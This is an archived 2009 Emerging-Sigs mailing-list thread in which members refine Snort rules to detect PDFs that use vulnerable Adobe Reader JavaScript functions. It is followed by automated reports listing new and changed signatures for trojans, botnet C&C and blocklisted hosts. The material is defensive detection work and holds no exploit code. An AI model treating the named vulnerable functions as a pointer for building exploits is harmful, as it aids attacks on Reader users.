From randolphdavidn at gmail.com Fri May 1 10:18:33 2009
From: randolphdavidn at gmail.com (Nick Randolph)
Date: Fri, 1 May 2009 10:18:33 -0400
Subject: [Emerging-Sigs] Recent Adobe Vulnerabilities BID 34736 and 34740
In-Reply-To:
References: <49F998AF.50105@jonkmans.com>
Message-ID:

It looks like it is catching the PoC now. I can't really set my flow_depth to 0 on my real sensor if it is going to affect performance like that.

I guess I have these for submission then.

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Adobe Reader - customDictionaryOpen javascript function"; flow:to_client,established; content:"customDictionaryOpen"; nocase; reference:bugtraq,34740; sid:xxxxxx; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Adobe Reader - getAnnots javascript function"; flow:to_client,established; content:"getAnnots"; nocase; reference:bugtraq,34736; sid:xxxxxx; rev:1;)

On Thu, Apr 30, 2009 at 7:34 PM, Will Metcalf wrote:
> I think what Matt meant to say was try to set flow_depth or
> server_flow_depth to 0 inside of your http_inspect config to see if they
> hit. Although if you are using this your IDS performance will go into the
> toilet, but it is a way to test your rule accuracy ;-)....
>
> Regards,
>
> Will
>
> On Thu, Apr 30, 2009 at 10:20 AM, Nick Randolph wrote:
>>
>> I just tried it without the flow statements. I have put text files on
>> a local web server that contain the strings I am trying to alert on.
>> The rule triggers on those text files but, not on the PoC from the
>> links. I've even tried copying the PoC from the links to my local web
>> server. Still no alert.
>>
>> On Thu, Apr 30, 2009 at 8:25 AM, Matt Jonkman wrote:
>> >
>> > Rules look like they ought to hit. Have you tried testing without the
>> > flow statements just to make sure there's not a reassembly issue going
>> > on?
>> >
>> > Matt
>> >
>> > Nick Randolph wrote:
>> > > http://www.securityfocus.com/bid/34740/info
>> > > http://www.securityfocus.com/bid/34736/info
>> > >
>> > > I'm trying to write some rules to pick up the use of these vulnerable
>> > > functions in PDF.
>> > >
>> > > It is not triggering on the proof of concept that is posted on the
>> > > links above.
>> > >
>> > > Here is what I have so far
>> > > alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Adobe Reader - spell.customDictionaryOpen Javascript function"; flow:to_client,established; content:"spell|2e|customDictionaryOpen|28|"; nocase; sid:xxxxxx;)
>> > >
>> > > alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Adobe Reader - getAnnots Javascript function"; flow:to_client,established; content:"getAnnots|28|"; nocase; sid:xxxxxx;)
>> > >
>> > > Any hints?
>> > >
>> > > ------------------------------------------------------------------------
>> > >
>> > > _______________________________________________
>> > > Emerging-sigs mailing list
>> > > Emerging-sigs at emergingthreats.net
>> > > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>> >
>> > --
>> > --------------------------------------------
>> > Matthew Jonkman
>> > Emerging Threats
>> > Phone 765-429-0398
>> > Fax 312-264-0205
>> > http://www.emergingthreats.net
>> > --------------------------------------------
>> >
>> > PGP: http://www.jonkmans.com/mattjonkman.asc
>> >
>>

From randolphdavidn at gmail.com Fri May 1 10:38:44 2009
From: randolphdavidn at gmail.com (Nick Randolph)
Date: Fri, 1 May 2009 10:38:44 -0400
Subject: [Emerging-Sigs] Recent Adobe Vulnerabilities BID 34736 and 34740
In-Reply-To:
References: <49F998AF.50105@jonkmans.com>
Message-ID:

Actually it looks like I forgot to add a few things back in to the content match. They should read

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Adobe Reader - customDictionaryOpen Javascript function"; flow:to_client,established; content:"spell|2e|customDictionaryOpen|28|"; nocase; reference:bugtraq,34740; sid:xxxxxx; rev:2;)

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Adobe Reader - getAnnots javascript function"; flow:to_client,established; content:"getAnnots|28|"; nocase; reference:bugtraq,34736; sid:xxxxxx; rev:1;)

On Fri, May 1, 2009 at 10:18 AM, Nick Randolph wrote:
> It looks like it is catching the PoC now. I can't really set my
> flow_depth to 0 on my real sensor if it is going to affect performance
> like that.
>
> I guess I have these for submission then.
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Adobe Reader -
> customDictionaryOpen javascript function"; flow:to_client,established;
> content:"customDictionaryOpen"; nocase; reference:bugtraq,34740;
> sid:xxxxxx; rev:1;)
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Adobe Reader -
> getAnnots javascript function"; flow:to_client,established;
> content:"getAnnots"; nocase; reference:bugtraq,34736; sid:xxxxxx; rev:1;)
>
>
> On Thu, Apr 30, 2009 at 7:34 PM, Will Metcalf wrote:
>> I think what Matt meant to say was try to set flow_depth or
>> server_flow_depth to 0 inside of your http_inspect config to see if they
>> hit. Although if you are using this your IDS performance will go into the
>> toilet, but it is a way to test your rule accuracy ;-)....
>>
>> Regards,
>>
>> Will
>>
>> On Thu, Apr 30, 2009 at 10:20 AM, Nick Randolph wrote:
>>>
>>> I just tried it without the flow statements. I have put text files on
>>> a local web server that contain the strings I am trying to alert on.
>>> The rule triggers on those text files but, not on the PoC from the
>>> links. I've even tried copying the PoC from the links to my local web
>>> server. Still no alert.
>>>
>>> On Thu, Apr 30, 2009 at 8:25 AM, Matt Jonkman wrote:
>>> >
>>> > Rules look like they ought to hit. Have you tried testing without the
>>> > flow statements just to make sure there's not a reassembly issue going
>>> > on?
>>> >
>>> > Matt
>>> >
>>> > Nick Randolph wrote:
>>> > > http://www.securityfocus.com/bid/34740/info
>>> > > http://www.securityfocus.com/bid/34736/info
>>> > >
>>> > > I'm trying to write some rules to pick up the use of these vulnerable
>>> > > functions in PDF.
>>> > >
>>> > > It is not triggering on the proof of concept that is posted on the
>>> > > links above.
>>> > >
>>> > > Here is what I have so far
>>> > > alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Adobe Reader - spell.customDictionaryOpen Javascript function"; flow:to_client,established; content:"spell|2e|customDictionaryOpen|28|"; nocase; sid:xxxxxx;)
>>> > >
>>> > > alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Adobe Reader - getAnnots Javascript function"; flow:to_client,established; content:"getAnnots|28|"; nocase; sid:xxxxxx;)
>>> > >
>>> > > Any hints?

From emerging at emergingthreats.net Fri May 1 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Fri, 1 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090501200010.C9B794501B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Fri May 1 16:00:10 2009 [***]

[+++] Added rules: [+++]
2009299 - ET TROJAN General Trojan Downloader (emerging-virus.rules)

[+++] Added non-rule lines: [+++]
-> Added to emerging-sid-msg.map (1):
2009299 || ET TROJAN General Trojan Downloader
-> Added to emerging-sid-msg.map.txt (1):
2009299 || ET TROJAN General Trojan Downloader

From emerging at emergingthreats.net Sat May 2 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat, 2 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090502200010.E2CD34501B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Sat May 2 16:00:10 2009 [***]

[*] Rules modifications: [*]
None.

[---] Removed non-rule lines: [---]
-> Removed from emerging-sid-msg.map (22):
2500123 || ET COMPROMISED Known Compromised or Hostile Host Traffic (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500124 || ET COMPROMISED Known Compromised or Hostile Host Traffic (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500125 || ET COMPROMISED Known Compromised or Hostile Host Traffic (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500126 || ET COMPROMISED Known Compromised or Hostile Host Traffic (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500127 || ET COMPROMISED Known Compromised or Hostile Host Traffic (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500128 || ET COMPROMISED Known Compromised or Hostile Host Traffic (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500129 || ET COMPROMISED Known Compromised or Hostile Host Traffic (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500130 || ET COMPROMISED Known Compromised or Hostile Host Traffic (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500131 || ET COMPROMISED Known Compromised or Hostile Host Traffic (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500132 || ET COMPROMISED Known Compromised or Hostile Host Traffic (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510123 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510124 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510125 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510126 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510127 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510128 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510129 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510130 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510131 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510132 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
-> Removed from emerging-sid-msg.map.txt (22):
2500123 || ET COMPROMISED Known Compromised or Hostile Host Traffic (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500124 || ET COMPROMISED Known Compromised or Hostile Host Traffic (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500125 || ET COMPROMISED Known Compromised or Hostile Host Traffic (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500126 || ET COMPROMISED Known Compromised or Hostile Host Traffic (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500127 || ET COMPROMISED Known Compromised or Hostile Host Traffic (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500128 || ET COMPROMISED Known Compromised or Hostile Host Traffic (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500129 || ET COMPROMISED Known Compromised or Hostile Host Traffic (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500130 || ET COMPROMISED Known Compromised or Hostile Host Traffic (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500131 || ET COMPROMISED Known Compromised or Hostile Host Traffic (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500132 || ET COMPROMISED Known Compromised or Hostile Host Traffic (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510123 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510124 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510125 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510126 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510127 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510128 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510129 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510130 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510131 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510132 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From emerging at emergingthreats.net Sat May 2 18:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat, 2 May 2009 18:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes
Message-ID: <20090502220011.13BBB4501B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Sat May 2 18:00:10 2009 [***]

[+++] Added rules: [+++]
2009296 - ET TROJAN Banker/Banbra Related HTTP Post-infection Checkin (emerging-virus.rules)
2009297 - ET TROJAN Boaxxe HTTP POST Checkin (emerging-virus.rules)
2009298 - ET SCAN Port Unreachable Response to Xprobe2 OS Fingerprint Scan (emerging-scan.rules)
2009299 - ET TROJAN General Trojan Downloader (emerging-virus.rules)
2400008 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2401008 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)

[///] Modified active rules: [///]
2400000 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400001 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400002 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400003 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400004 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400005 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400006 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400007 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2401000 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401001 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401002 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401003 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401004 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401005 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401006 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401007 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules)
2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules)
2404000 - ET DROP Known Bot C&C Server Traffic (group 1) (emerging-botcc.rules)
2404001 - ET DROP Known Bot C&C Server Traffic (group 2) (emerging-botcc.rules)
2404002 - ET DROP Known Bot C&C Server Traffic (group 3) (emerging-botcc.rules)
2404003 - ET DROP Known Bot C&C Server Traffic (group 4) (emerging-botcc.rules)
2404004 - ET DROP Known Bot C&C Server Traffic (group 5) (emerging-botcc.rules)
2404005 - ET DROP Known Bot C&C Server Traffic (group 6) (emerging-botcc.rules)
2404006 - ET DROP Known Bot C&C Server Traffic (group 7) (emerging-botcc.rules)
2404007 - ET DROP Known Bot C&C Server Traffic (group 8) (emerging-botcc.rules)
2404008 - ET DROP Known Bot C&C Server Traffic (group 9) (emerging-botcc.rules)
2404009 - ET DROP Known Bot C&C Server Traffic (group 10) (emerging-botcc.rules)
2404010 - ET DROP Known Bot C&C Server Traffic (group 11) (emerging-botcc.rules)
2404011 - ET DROP Known Bot C&C Server Traffic (group 12) (emerging-botcc.rules)
2404012 - ET DROP Known Bot C&C Server Traffic (group 13) (emerging-botcc.rules)
2404013 - ET DROP Known Bot C&C Server Traffic (group 14) (emerging-botcc.rules)
2404014 - ET DROP Known Bot C&C Server Traffic (group 15) (emerging-botcc.rules)
2404015 - ET DROP Known Bot C&C Server Traffic (group 16) (emerging-botcc.rules)
2404016 - ET DROP Known Bot C&C Server Traffic (group 17) (emerging-botcc.rules)
2404017 - ET DROP Known Bot C&C Server Traffic (group 18) (emerging-botcc.rules)
2404018 - ET DROP Known Bot C&C Server Traffic (group 19) (emerging-botcc.rules)
2404019 - ET DROP Known Bot C&C Server Traffic (group 20) (emerging-botcc.rules)
2404020 - ET DROP Known Bot C&C Server Traffic (group 21) (emerging-botcc.rules)
2404021 - ET DROP Known Bot C&C Server Traffic (group 22) (emerging-botcc.rules)
2404022 - ET DROP Known Bot C&C Server Traffic (group 23) (emerging-botcc.rules)
2404023 - ET DROP Known Bot C&C Server Traffic (group 24) (emerging-botcc.rules)
2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405020 - ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405021 - ET DROP Known Bot C&C Traffic (group 22) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405022 - ET DROP Known Bot C&C Traffic (group 23) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405023 - ET DROP Known Bot C&C Traffic (group 24) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2406000 - ET RBN Known Russian Business Network Monitored Domains (1) (emerging-rbn.rules)
2406001 - ET RBN Known Russian Business Network Monitored Domains (2) (emerging-rbn.rules)
2406002 - ET RBN Known Russian Business Network Monitored Domains (3) (emerging-rbn.rules)
2406003 - ET RBN Known Russian Business Network Monitored Domains (4) (emerging-rbn.rules)
2406004 - ET RBN Known Russian Business Network Monitored Domains (5) (emerging-rbn.rules)
2406005 - ET RBN Known Russian Business Network Monitored Domains (6) (emerging-rbn.rules)
2406006 - ET RBN Known Russian Business Network Monitored Domains (7) (emerging-rbn.rules)
2406007 - ET RBN Known Russian Business Network Monitored Domains (8) (emerging-rbn.rules)
2406008 - ET RBN Known Russian Business Network Monitored Domains (9) (emerging-rbn.rules)
2406009 - ET RBN Known Russian Business Network Monitored Domains (10) (emerging-rbn.rules)
2406010 - ET RBN Known Russian Business Network Monitored Domains (11) (emerging-rbn.rules)
2406011 - ET RBN Known Russian Business Network Monitored Domains (12) (emerging-rbn.rules)
2406012 - ET RBN Known Russian Business Network Monitored Domains (13) (emerging-rbn.rules)
2406013 - ET RBN Known Russian Business Network Monitored Domains (14) (emerging-rbn.rules)
2406014 - ET RBN Known Russian Business Network Monitored Domains (15) (emerging-rbn.rules)
2406015 - ET RBN Known Russian Business Network Monitored Domains (16) (emerging-rbn.rules)
2406016 - ET RBN Known Russian Business Network Monitored Domains (17) (emerging-rbn.rules)
2406017 - ET RBN Known Russian Business Network Monitored Domains (18) (emerging-rbn.rules)
2406018 - ET RBN Known Russian Business Network Monitored Domains (19) (emerging-rbn.rules)
2406019 - ET RBN Known Russian Business Network Monitored Domains (20) (emerging-rbn.rules)
2406020 - ET RBN Known Russian Business Network Monitored Domains (21) (emerging-rbn.rules)
2406021 - ET RBN Known Russian Business Network Monitored Domains (22) (emerging-rbn.rules)
2406022 - ET RBN Known Russian Business Network Monitored Domains (23) (emerging-rbn.rules)
2406023 - ET RBN Known Russian Business Network Monitored Domains (24) (emerging-rbn.rules)
2406024 - ET RBN Known Russian Business Network Monitored Domains (25) (emerging-rbn.rules)
2406025 - ET RBN Known Russian Business Network Monitored Domains (26) (emerging-rbn.rules)
2406026 - ET RBN Known Russian Business Network Monitored Domains (27) (emerging-rbn.rules)
2406027 - ET RBN Known Russian Business Network Monitored Domains (28) (emerging-rbn.rules)
2406028 - ET RBN Known Russian Business Network Monitored Domains (29) (emerging-rbn.rules)
2406029 - ET RBN Known Russian Business Network Monitored Domains (30) (emerging-rbn.rules)
2406030 - ET RBN Known Russian Business Network Monitored Domains (31) (emerging-rbn.rules)
2406031 - ET RBN Known Russian Business Network Monitored Domains (32) (emerging-rbn.rules)
2406032 - ET RBN Known Russian Business Network Monitored Domains (33) (emerging-rbn.rules)
2406033 - ET RBN Known Russian Business Network Monitored Domains (34) (emerging-rbn.rules)
2406034 - ET RBN Known Russian Business Network Monitored Domains (35) (emerging-rbn.rules)
2406035 - ET RBN Known Russian Business Network Monitored Domains (36) (emerging-rbn.rules)
2406036 - ET RBN Known Russian Business Network Monitored Domains (37) (emerging-rbn.rules)
2406037 - ET RBN Known Russian Business Network Monitored Domains (38) (emerging-rbn.rules)
2406038 - ET RBN Known Russian Business Network Monitored Domains (39) (emerging-rbn.rules)
2406039 - ET RBN Known Russian Business Network Monitored Domains (40) (emerging-rbn.rules)
2406040 - ET RBN Known Russian Business Network Monitored Domains (41) (emerging-rbn.rules)
2406041 - ET RBN Known Russian Business Network Monitored Domains (42) (emerging-rbn.rules)
2406042 - ET RBN Known Russian Business Network Monitored Domains (43) (emerging-rbn.rules)
2406043 - ET RBN Known Russian Business Network Monitored Domains (44) (emerging-rbn.rules)
2406044 - ET RBN Known Russian Business Network Monitored Domains (45) (emerging-rbn.rules)
2406045 - ET RBN Known Russian Business Network Monitored Domains (46) (emerging-rbn.rules)
2406046 - ET RBN Known Russian Business Network Monitored Domains (47) (emerging-rbn.rules)
2406047 - ET RBN Known Russian Business Network Monitored Domains (48) (emerging-rbn.rules)
2406048 - ET RBN Known Russian Business Network Monitored Domains (49) (emerging-rbn.rules)
2406049 - ET RBN Known Russian Business Network Monitored Domains (50) (emerging-rbn.rules)
2406050 - ET RBN Known Russian Business Network Monitored Domains (51) (emerging-rbn.rules)
2406051 - ET RBN Known Russian Business Network Monitored Domains (52) (emerging-rbn.rules)
2406052 - ET RBN Known Russian Business Network Monitored Domains (53) (emerging-rbn.rules)
2406053 - ET RBN Known Russian Business Network Monitored Domains (54) (emerging-rbn.rules)
2406054 - ET RBN Known Russian Business Network Monitored Domains (55) (emerging-rbn.rules)
2406055 - ET RBN Known Russian Business Network Monitored Domains (56) (emerging-rbn.rules)
2406056 - ET RBN Known Russian Business Network Monitored Domains (57) (emerging-rbn.rules)
2406057 - ET RBN Known Russian Business Network Monitored Domains (58) (emerging-rbn.rules)
2406058 - ET RBN Known Russian Business Network Monitored Domains (59) (emerging-rbn.rules)
2406059 - ET RBN Known Russian Business Network Monitored Domains (60) (emerging-rbn.rules)
2406060 - ET RBN Known Russian Business Network Monitored Domains (61) (emerging-rbn.rules)
2406061 - ET RBN Known Russian Business Network Monitored Domains (62) (emerging-rbn.rules)
2406062 - ET RBN Known Russian Business Network Monitored Domains (63) (emerging-rbn.rules)
2406063 - ET RBN Known Russian Business Network Monitored Domains (64) (emerging-rbn.rules)
2406064 - ET RBN Known Russian Business Network Monitored Domains (65) (emerging-rbn.rules)
2406065 - ET RBN Known Russian Business Network Monitored Domains (66) (emerging-rbn.rules)
2406066 - ET RBN Known Russian Business Network Monitored Domains (67) (emerging-rbn.rules)
2406067 - ET RBN Known Russian Business Network Monitored Domains (68) (emerging-rbn.rules)
2406068 - ET RBN Known Russian Business Network Monitored Domains (69) (emerging-rbn.rules)
2406069 - ET RBN Known Russian Business Network Monitored Domains (70) (emerging-rbn.rules)
2406070 - ET RBN Known Russian Business Network Monitored Domains (71) (emerging-rbn.rules)
2406071 - ET RBN Known Russian Business Network Monitored Domains (72) (emerging-rbn.rules)
2406072 - ET RBN Known Russian Business Network Monitored Domains (73) (emerging-rbn.rules)
2406073 - ET RBN Known Russian Business Network Monitored Domains (74) (emerging-rbn.rules)
2406074 - ET RBN Known Russian Business Network Monitored Domains (75) (emerging-rbn.rules)
2406075 - ET RBN Known Russian Business Network Monitored Domains (76) (emerging-rbn.rules)
2406076 - ET RBN Known Russian Business Network Monitored Domains (77) (emerging-rbn.rules)
2406077 - ET RBN Known Russian Business Network Monitored Domains (78) (emerging-rbn.rules)
2406078 - ET RBN Known Russian Business Network Monitored Domains (79) (emerging-rbn.rules)
2406079 - ET RBN Known Russian Business Network Monitored Domains (80) (emerging-rbn.rules)
2406080 - ET RBN Known Russian Business Network Monitored Domains (81) (emerging-rbn.rules)
2406081 - ET RBN Known Russian Business Network Monitored Domains (82) (emerging-rbn.rules)
2406082 - ET RBN Known Russian Business Network Monitored Domains (83) (emerging-rbn.rules)
2406083 - ET RBN Known Russian Business Network Monitored Domains (84) (emerging-rbn.rules)
2406084 - ET RBN Known Russian Business Network Monitored Domains (85) (emerging-rbn.rules)
2406085 - ET RBN Known Russian Business Network Monitored Domains (86) (emerging-rbn.rules)
2406086 - ET RBN Known Russian Business Network Monitored Domains (87) (emerging-rbn.rules)
2406087 - ET RBN Known Russian Business Network Monitored Domains (88) (emerging-rbn.rules)
2406088 - ET RBN Known Russian Business Network Monitored Domains (89) (emerging-rbn.rules)
2406089 - ET RBN Known Russian Business Network Monitored Domains (90) (emerging-rbn.rules)
2406090 - ET RBN Known Russian Business Network Monitored Domains (91) (emerging-rbn.rules)
2406091 - ET RBN Known Russian Business Network Monitored Domains (92) (emerging-rbn.rules)
2406092 - ET RBN Known Russian Business Network Monitored Domains (93) (emerging-rbn.rules)
2406093 - ET RBN Known Russian Business Network Monitored Domains (94) (emerging-rbn.rules)
2406094 - ET RBN Known Russian Business Network Monitored Domains (95) (emerging-rbn.rules)
2406095 - ET RBN Known Russian Business Network Monitored Domains (96) (emerging-rbn.rules)
2406096 - ET RBN Known Russian Business Network Monitored Domains (97) (emerging-rbn.rules)
2406097 - ET RBN Known Russian Business Network Monitored Domains (98) (emerging-rbn.rules)
2406098 - ET RBN Known Russian Business Network Monitored Domains (99) (emerging-rbn.rules)
2406099 - ET RBN Known Russian Business Network Monitored Domains (100) (emerging-rbn.rules)
2406100 - ET RBN Known Russian Business Network Monitored Domains (101) (emerging-rbn.rules)
2406101 - ET RBN Known Russian Business Network Monitored Domains (102) (emerging-rbn.rules)
2406102 - ET RBN Known Russian Business Network Monitored Domains (103) (emerging-rbn.rules)
2406103 - ET RBN Known Russian Business Network Monitored Domains (104) (emerging-rbn.rules)
2406104 - ET RBN Known Russian Business Network Monitored Domains (105) (emerging-rbn.rules)
2406105 - ET RBN Known Russian Business Network Monitored Domains (106) (emerging-rbn.rules)
